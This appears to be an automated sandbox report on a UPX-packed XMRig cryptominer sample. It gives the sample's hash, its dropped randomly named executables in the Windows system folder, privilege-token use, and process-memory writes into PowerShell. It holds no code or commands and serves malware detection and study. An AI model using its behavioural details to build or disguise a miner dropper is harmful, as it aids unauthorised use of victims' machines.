Malware Analysis Report

2024-09-10 23:01

Sample ID 240613-1v3ens1hrb
Target 8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe
SHA256 77645d72881d249846455958550db59b9249238399f5f797b7d5bc44afd49e73
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

77645d72881d249846455958550db59b9249238399f5f797b7d5bc44afd49e73

Threat Level: Known bad

The file 8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 21:59

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 21:59

Reported

2024-06-13 22:01

Platform

win7-20240508-en

Max time kernel

149s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\boMoguf.exe N/A
N/A N/A C:\Windows\System\iQoVlVu.exe N/A
N/A N/A C:\Windows\System\XmUppaC.exe N/A
N/A N/A C:\Windows\System\xvHeImQ.exe N/A
N/A N/A C:\Windows\System\XWhXKiz.exe N/A
N/A N/A C:\Windows\System\liMpmKv.exe N/A
N/A N/A C:\Windows\System\plupKYM.exe N/A
N/A N/A C:\Windows\System\FdiSYks.exe N/A
N/A N/A C:\Windows\System\ADELqbG.exe N/A
N/A N/A C:\Windows\System\RMWtnjz.exe N/A
N/A N/A C:\Windows\System\EjtWVbQ.exe N/A
N/A N/A C:\Windows\System\uLLcFTT.exe N/A
N/A N/A C:\Windows\System\cdaHRpZ.exe N/A
N/A N/A C:\Windows\System\qlRKsKJ.exe N/A
N/A N/A C:\Windows\System\MNTgqrx.exe N/A
N/A N/A C:\Windows\System\qcypcLz.exe N/A
N/A N/A C:\Windows\System\ebLBrBw.exe N/A
N/A N/A C:\Windows\System\vmvEDaL.exe N/A
N/A N/A C:\Windows\System\JGtYHFa.exe N/A
N/A N/A C:\Windows\System\PhEMEYy.exe N/A
N/A N/A C:\Windows\System\EvkUEIs.exe N/A
N/A N/A C:\Windows\System\wyKiHFz.exe N/A
N/A N/A C:\Windows\System\DdXURTq.exe N/A
N/A N/A C:\Windows\System\GEuQvGW.exe N/A
N/A N/A C:\Windows\System\dSNZCQF.exe N/A
N/A N/A C:\Windows\System\nDPBRxQ.exe N/A
N/A N/A C:\Windows\System\lkeyDyB.exe N/A
N/A N/A C:\Windows\System\oamUrnf.exe N/A
N/A N/A C:\Windows\System\AFSEpfB.exe N/A
N/A N/A C:\Windows\System\LNcqjwO.exe N/A
N/A N/A C:\Windows\System\OfpgkLf.exe N/A
N/A N/A C:\Windows\System\bslXWOc.exe N/A
N/A N/A C:\Windows\System\sMjQmSh.exe N/A
N/A N/A C:\Windows\System\JqXWfGK.exe N/A
N/A N/A C:\Windows\System\QUuRjPJ.exe N/A
N/A N/A C:\Windows\System\YSVUtZS.exe N/A
N/A N/A C:\Windows\System\hMZHoYw.exe N/A
N/A N/A C:\Windows\System\qUQgRPL.exe N/A
N/A N/A C:\Windows\System\KSiCwAU.exe N/A
N/A N/A C:\Windows\System\VmhBdBB.exe N/A
N/A N/A C:\Windows\System\mSTTUhV.exe N/A
N/A N/A C:\Windows\System\DStCmgL.exe N/A
N/A N/A C:\Windows\System\jyLsbwn.exe N/A
N/A N/A C:\Windows\System\ZoEZcyu.exe N/A
N/A N/A C:\Windows\System\jLlKNww.exe N/A
N/A N/A C:\Windows\System\gKTEGyA.exe N/A
N/A N/A C:\Windows\System\lVDJAca.exe N/A
N/A N/A C:\Windows\System\TGOMiZg.exe N/A
N/A N/A C:\Windows\System\gdIGmEO.exe N/A
N/A N/A C:\Windows\System\WRuqRhu.exe N/A
N/A N/A C:\Windows\System\zzPVvQy.exe N/A
N/A N/A C:\Windows\System\RyPiaWN.exe N/A
N/A N/A C:\Windows\System\uUvbHaL.exe N/A
N/A N/A C:\Windows\System\ExGEuVW.exe N/A
N/A N/A C:\Windows\System\jlIDvOK.exe N/A
N/A N/A C:\Windows\System\EvhosdO.exe N/A
N/A N/A C:\Windows\System\kPGQmsO.exe N/A
N/A N/A C:\Windows\System\zTxUbIJ.exe N/A
N/A N/A C:\Windows\System\aRrORpy.exe N/A
N/A N/A C:\Windows\System\uCmFlfk.exe N/A
N/A N/A C:\Windows\System\qZVsdEd.exe N/A
N/A N/A C:\Windows\System\ABsWUOs.exe N/A
N/A N/A C:\Windows\System\fWHsKGW.exe N/A
N/A N/A C:\Windows\System\RCqywIx.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\FcxUgtL.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YENEatf.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nByEyQt.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hUjBfHw.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ynAYooM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sERLXdu.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MWonqaf.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bnsjNEJ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eIbbtOZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EuDTDkI.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZiObpsw.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ozsqKhS.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iilQfym.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dcoIhvo.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aAMBKIn.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OSENVnk.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sNwjBLM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iWRTntg.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bGQtagY.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ptKWoCR.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zOoHcsP.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\joYuSpX.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WNzHBOp.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nMGMCNB.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MNTgqrx.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lhgSKZx.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vecmJXR.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gucQZSl.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dwXOdJy.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UWDiCYv.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JMHncEr.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MnZPlgj.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GSVkyjX.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YEusXxf.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VoJgIjy.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oPVrxtx.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\niLQBPu.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lVvhvcZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rwhDnwT.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pvfATuN.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GFlVqnp.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ROrtLBI.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TFZJWva.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ULbCCSM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wZGdGPf.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cNMbTZZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JtuTZWM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OSzsiHZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VaUTMns.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\slCJQof.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YhlrzbN.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nkdQUzy.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dlWJEKA.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nkcaRrB.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KXjuskL.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CgszThv.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AYrnYWh.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ycfNfYo.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\adEOqny.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xUqzPHa.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wsLAOmK.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LnonuUj.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RxGynHK.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JRxfJXj.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\boMoguf.exe
PID 1600 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\boMoguf.exe
PID 1600 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\boMoguf.exe
PID 1600 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\iQoVlVu.exe
PID 1600 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\iQoVlVu.exe
PID 1600 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\iQoVlVu.exe
PID 1600 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XmUppaC.exe
PID 1600 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XmUppaC.exe
PID 1600 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XmUppaC.exe
